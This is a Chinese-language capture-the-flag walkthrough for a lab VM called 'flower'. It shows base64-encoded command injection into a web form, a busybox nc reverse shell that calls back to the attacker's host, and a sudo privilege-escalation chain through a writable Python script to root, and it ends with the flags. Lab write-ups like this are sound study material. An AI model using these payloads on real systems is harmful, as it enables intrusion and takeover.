Nmap
┌──(kali㉿kali)-[~/aaa]
└─$ nmap -p0-65535 --min-rate 5000 192.168.205.239
Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-19 11:54 -0400
Nmap scan report for 192.168.205.239
Host is up (0.00033s latency).
Not shown: 65535 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:80:83:27 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.63 seconds只开了 80,直接看 Web。
Web 枚举
首页是个花瓣计算器,表单提交到 /,选项值都是 base64:
<option name="Lily" value="MSsy">Lily</option>
<option name="Buttercup" value="Misz">Buttercup</option>
<option name="Delphiniums" value="Mys1">Delphiniums</option>
<option name="Cineraria" value="NSs4">Cineraria</option>
<option name="Chicory" value="OCsxMw==">Chicory</option>
<option name="Chrysanthemum" value="MTMrMjE=">Chrysanthemum</option>
<option name="Michaelmas daisies" value="MjErMzQ=">Michaelmas daisies</option>解码后发现是斐波那契数列表达式:
1+2, 2+3, 3+5, 5+8, 8+13, 13+21, 21+34
POST 后返回计算结果,比如 1+2 返回 3 petals。
扫目录找到 /run.sh:
┌──(kali㉿kali)-[~/aaa]
└─$ curl http://192.168.205.239/run.sh
php -S 0.0.0.0后端是 PHP 内置服务器。
命令注入
既然是 base64 解码后当表达式算,试试反引号命令替换:
┌──(kali㉿kali)-[~/aaa]
└─$ printf '`id`' | base64 -w0
YGlkYA==
┌──(kali㉿kali)-[~/aaa]
└─$ curl -s -X POST http://192.168.205.239/ -d 'petals=YGlkYA=='
...
uid=33(www-data) gid=33(www-data) groups=33(www-data)
petals命令注入成了,返回了 www-data 的 uid。
反弹 Shell
起个 listener:
┌──(kali㉿kali)-[~/aaa]
└─$ penelope -p 8888构造 busybox nc 反弹的 payload:
┌──(kali㉿kali)-[~/aaa]
└─$ printf '`busybox nc 192.168.205.128 8888 -e /bin/sh`' | base64 -w0
YGJ1c3lib3ggbmMgMTkyLjE2OC4yMDUuMTI4IDg4ODggLWUgL2Jpbi9zaGA=提交:
┌──(kali㉿kali)-[~/aaa]
└─$ curl -s -X POST http://192.168.205.239/ -d 'petals=YGJ1c3lib3ggbmMgMTkyLjE2OC4yMDUuMTI4IDg4ODggLWUgL2Jpbi9zaGA='penelope 自动处理好 PTY,拿到 www-data shell:
www-data@flower:/var/www/html$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)sudo -l
www-data@flower:~$ sudo -l
Matching Defaults entries for www-data on flower:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on flower:
(rose) NOPASSWD: /usr/bin/python3 /home/rose/diary/diary.py可以用 rose 身份跑 diary.py。
diary.py 分析
看看原始内容:
www-data@flower:~$ cat /home/rose/diary/diary.py
import pickle
diary = {"November28":"i found a blue viola","December1":"i lost my blue viola"}
p = open('diary.pickle','wb')
pickle.dump(diary,p)再看权限:
www-data@flower:~$ ls -la /home/rose/diary/
total 12
drwxrwxrwx 2 rose rose 4096 Nov 30 2020 .
drwxr-xr-x 3 rose rose 4096 Nov 30 2020 ..
-rw-r--r-- 1 rose rose 147 Nov 30 2020 diary.py目录权限是 777,www-data 可以直接删除并重建 diary.py。
提权到 Rose
先枚举 rose 的 sudo 权限,写个临时脚本覆盖 /home/rose/diary/diary.py:
import os
os.system('sudo -l')以 rose 身份运行:
www-data@flower:~$ sudo -u rose /usr/bin/python3 /home/rose/diary/diary.py
Matching Defaults entries for rose on flower:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User rose may run the following commands on flower:
(root) NOPASSWD: /bin/bash /home/rose/.plantbookrose 能以 root 身份跑 /bin/bash /home/rose/.plantbook。
看看原始的 .plantbook:
#!/bin/bash
echo Hello, write the name of the flower that u found
read flower
echo Nice, $flower submitted on : $(date)权限是 -rwx------,只有 rose 能写。
利用思路就是:
1. 用 diary.py 以 rose 身份改写 .plantbook
2. 再用 diary.py 以 rose 身份 sudo 执行 .plantbook
先覆写 .plantbook,让它直接起一个保留 root 权限的 shell:
import os
os.system('echo "bash -p" > /home/rose/.plantbook')写入 /home/rose/diary/diary.py 后以 rose 身份执行:
www-data@flower:~$ sudo -u rose /usr/bin/python3 /home/rose/diary/diary.py然后第二步,再覆写 diary.py,让它 sudo 执行修改后的 .plantbook:
import os
os.system('sudo /bin/bash /home/rose/.plantbook')写入后再跑一次:
www-data@flower:~$ sudo -u rose /usr/bin/python3 /home/rose/diary/diary.py
root@flower:/home/rose/diary# id
uid=0(root) gid=0(root) groups=0(root)拿到 root shell。
Flag
root@flower:~# cat /home/rose/user.txt
HMV{R0ses_are_R3d$}
root@flower:~# cat /root/root.txt
HMV{R0ses_are_als0_black.}